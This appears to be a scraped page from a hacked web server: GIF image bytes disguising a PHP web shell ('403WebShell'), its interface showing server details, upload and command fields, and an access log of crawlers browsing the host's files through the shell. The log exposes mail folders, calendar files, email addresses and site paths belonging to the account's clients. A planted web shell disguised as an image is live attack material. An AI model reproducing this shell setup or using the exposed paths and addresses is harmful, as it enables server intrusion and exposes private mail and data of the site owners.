GIF89a=( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ !ù ' !ÿ NETSCAPE2.0 , =( þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE¯°¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ |¥ ٭&ºìE8œ¹kGÔAÞpx­a¶­ã R2XB®åE8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ  4#ZÔ‰O|-4Bs‘X:= QÉ œš lºÒyXJŠGȦ|s hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ ¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5 ½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ  l5‘ޝpß ´ ˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½ ‘Ý{ó)vmÞü%D~ 6f s}ŃƒDØW Eþ`‡þ À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`} lď’ÄÉ@4>ñd œ à‘vÒxNÃ×™@žd=ˆgsžG±æ ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH] †¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ ».Û¬¯t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°Ÿð0Ä_ ½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p% AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À× ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ ö×Þ^`8EÜ]ý.뜃Âç 7 ú ȉÞj œ½Dç zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼ &A¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂxŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`A Ú/NE€Ø†À9‚@¤à H½7”à‡%B‰`Àl*ƒó‘–‡8 2ñ%¸ —€:Ù1Á‰E¸àux%nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û °b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@% òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐ QTÂo‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3 ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚ !ù " , =( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g «¬ E ±± ¨­¶°ººE Á´”·®C¬²§Ç¶Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ» K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M '¡¨2¸*Ÿþ>#n↠å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA 9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦‚ ŽkÛTÇDpE@WÜ ²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰  h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8 #VÇá ‘å–ÄV„œ|Аè•m"сœn|@›U¶ÆÎž—Špb¥G¨ED”€±Úê2FÌIç? >Éxå Œ± ¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë QÀÉSÌÂÇ2ÌXÀ{æk²lQÁ2«ÊðÀ¯w|2Í h‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ ü ôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶ 0QwG#¯ æš[^Äþ $ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ìL¹ „®£œŠ‚à0œ]PÁ^p F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q q” ‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/ &.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ ¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—! ¦t)K%tœ-¦JF bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ ‰ !ù ) , =( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª« E$±²¨ª­ · °²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ E ééH½MÛÂGâªD­ çBêêϾD²ÒaÀà€Š1r­ðÓ¤ ÔožzU!L˜C'¾yW½UGtäÇïÙllê0×àÂuGþ)AÀs[þ·xì ÁxO%ƒûX2ó—  P£n›R/¡ÑšHše+êDm?# —‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°- <‡ *´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð ;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á  ~Öº“®›¸ÏMDfJÙ °„ÛµáWõ%§œ‚à©–‚X ÓØ)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d €CÁW)HÜcC$€L Ä7„r.á\{)@ð` @ äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦P …d’ä¡“¦ðÎTƒ¦ià|À _ ¥ Qi#¦Šg›Æ ›noMµ ›V ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, \jÛ´›6±¬¶C ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥ ²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëê 7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*3)O‘˜Ö[_hv ,àî×Et Ÿé¶BH€ Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g› êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºíï{ËC Ú— "”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»] A#ð «€¿šéz)Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa ¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oа^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ® ©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF Í[¤+‹ðɈ-áwj¨¥þ8¾rá ,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK “¦Ç# âDÂ:ûc?:R Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW ,ˆ”8(T™P‰F¡Jhç"‚ ; 403WebShell
403Webshell
Server IP : 104.21.83.152  /  Your IP : 216.73.216.243
Web Server : LiteSpeed
System : Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : akhalid ( 749)
PHP Version : 8.3.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhalid/access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/akhalid/access-logs/ahmedkhalid.maxsym.co-ssl_log
20.171.207.219 - - [07/Jul/2025:08:18:33 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fibo%2FLC_MESSAGES HTTP/1.1" 200 8147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:34 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fawa%2FLC_MESSAGES HTTP/1.1" 200 8147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:35 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fpeo%2F HTTP/1.1" 200 8270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.73.239.35 - - [07/Jul/2025:08:18:36 -0400] "GET /228ef4/index.php?lokasie=/proc/thread-self/root/opt/alt/python38/share/doc/alt-python38-setuptools/deprecated/distutils/apiref.rst&loknya=/proc/thread-self/root/opt/alt/python38/share/doc/alt-python38-setuptools/deprecated/distutils HTTP/1.1" 200 33007 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.219 - - [07/Jul/2025:08:18:37 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fos%2F HTTP/1.1" 200 8275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:38 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fhz%2F HTTP/1.1" 200 8276 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:39 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Ftw%2F HTTP/1.1" 200 8271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.54.15.103 - - [07/Jul/2025:08:18:40 -0400] "GET /228ef4/?loknya=/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/firmware/wfx HTTP/1.1" 200 8500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.219 - - [07/Jul/2025:08:18:40 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fsg%2FLC_MESSAGES HTTP/1.1" 200 8150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:41 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fibo%2F HTTP/1.1" 200 8308 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:43 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fiu%2FLC_MESSAGES HTTP/1.1" 200 8361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:44 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fna%2FLC_MESSAGES HTTP/1.1" 200 8361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.23.180.225 - - [07/Jul/2025:08:18:44 -0400] "GET /228ef4/index.php?loknya=/proc/thread-self/proc/thread-self/opt/cloudlinux/alt-php80/ HTTP/1.1" 200 8129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.75.33 - - [07/Jul/2025:08:18:45 -0400] "GET /search.php?products/8ha12501 HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.219 - - [07/Jul/2025:08:18:45 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fzh%2FLC_MESSAGES HTTP/1.1" 200 8150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:46 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fdv%2F HTTP/1.1" 200 8274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:47 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fawa%2F HTTP/1.1" 200 8270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.94.199.128 - - [07/Jul/2025:08:18:48 -0400] "GET /228ef4/?loknya=/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/home/akhalid/.cphorde/vfsroot HTTP/1.1" 200 8174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.219 - - [07/Jul/2025:08:18:48 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fkut%2FLC_MESSAGES HTTP/1.1" 200 8182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:49 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fna%2F HTTP/1.1" 200 8311 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:51 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fsg%2F HTTP/1.1" 200 8275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.219 - - [07/Jul/2025:08:18:52 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fiu%2F HTTP/1.1" 200 8311 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.205.222.214 - - [07/Jul/2025:08:18:52 -0400] "GET /228ef4/?loknya=/proc/thread-self/root/proc/thread-self/root/lib64/python3.8/site-packages/ HTTP/1.1" 200 8496 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.219 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fso%2FLC_MESSAGES HTTP/1.1" 200 8432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/index.php?lokasie=%2Fhome%2Fakhalid%2Fsaitoncompany.com%2F.htaccess&loknya=%2Fhome%2Fakhalid%2Fsaitoncompany.com HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/index.php?loknya=%2Fhome%2Fakhalid%2Fmail%2F.maliy%40nas-yemen_org%2Fnew HTTP/1.1" 200 8124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibxmlrpc.so.3&loknya=%2Flib64 HTTP/1.1" 200 51555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-QuZ-a0-jf-b0-50.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 412392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-includes%2Fauthor-template.php&loknya=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-includes HTTP/1.1" 200 13339 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibldb.so.2.8.0&loknya=%2Flib64 HTTP/1.1" 200 94764 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/index.php?loknya=%2Fhome%2Fakhalid%2F.caldav%2Fmaliy%40nas-yemen.org HTTP/1.1" 200 8443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibgraphite2.so.3.0.1&loknya=%2Flib64 HTTP/1.1" 200 91457 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2FTAS2XXX3EE01.bin&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 15635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2F.cpanel%2Ficals%2Finfo%40ibrenergy.com.ics&loknya=%2Fhome%2Fakhalid%2F.cpanel%2Ficals HTTP/1.1" 200 7963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:54 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Fomerys%2Fpublic_html--%2Fcatalog%2F.htaccess&loknya=%2Fhome%2Fakhalid%2Fomerys%2Fpublic_html--%2Fcatalog HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:54 -0400] "GET /228ef4/?lokasie=%2Fusr%2Flocal%2Flsws%2FLICENSE&loknya=%2Fusr%2Flocal%2Flsws HTTP/1.1" 200 11021 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:54 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Fmail%2F.waleed%40maxsym_co%2Fnew HTTP/1.1" 200 8398 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:18:54 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fund%2FLC_MESSAGES HTTP/1.1" 200 8147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/index.php?lokasie=%2Fhome%2Fakhalid%2F.cphorde%2Fhorde.log&loknya=%2Fhome%2Fakhalid%2F.cphorde HTTP/1.1" 200 7849 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:54 -0400] "GET /228ef4/?lokasie=%2Flib%2Fsystemd%2Fuser%2Fsockets.target&loknya=%2Flib%2Fsystemd%2Fuser HTTP/1.1" 200 8123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:54 -0400] "GET /228ef4/?lokasie=%2Flib64%2Fpgsql%2Futf8_and_gbk.so&loknya=%2Flib64%2Fpgsql HTTP/1.1" 200 29803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-so-a0-gf4-a0-83.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 594931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:54 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibglut.so.3.10.0&loknya=%2Flib64 HTTP/1.1" 200 104406 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2F7%2F8 HTTP/1.1" 200 8482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/?lokasie=%2Flib64%2Fxtables%2Flibxt_TCPMSS.so&loknya=%2Flib64%2Fxtables HTTP/1.1" 200 11395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/?lokasie=%2Fusr%2Flib64%2Faspell-0.60%2Fcp1258.cset&loknya=%2Fusr%2Flib64%2Faspell-0.60 HTTP/1.1" 200 11379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/?loknya=%2Fopt%2Falt%2Fphp53 HTTP/1.1" 200 8370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:53 -0400] "GET /228ef4/index.php?lokasie=%2Fbin%2Fmariadb-check&loknya=%2Fbin HTTP/1.1" 200 714921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Fmail%2F.info%40ashkal_co%2Fcur HTTP/1.1" 200 8404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibk5crypto.so&loknya=%2Flib64 HTTP/1.1" 200 43245 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:18:55 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fsgn%2FLC_MESSAGES HTTP/1.1" 200 8182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
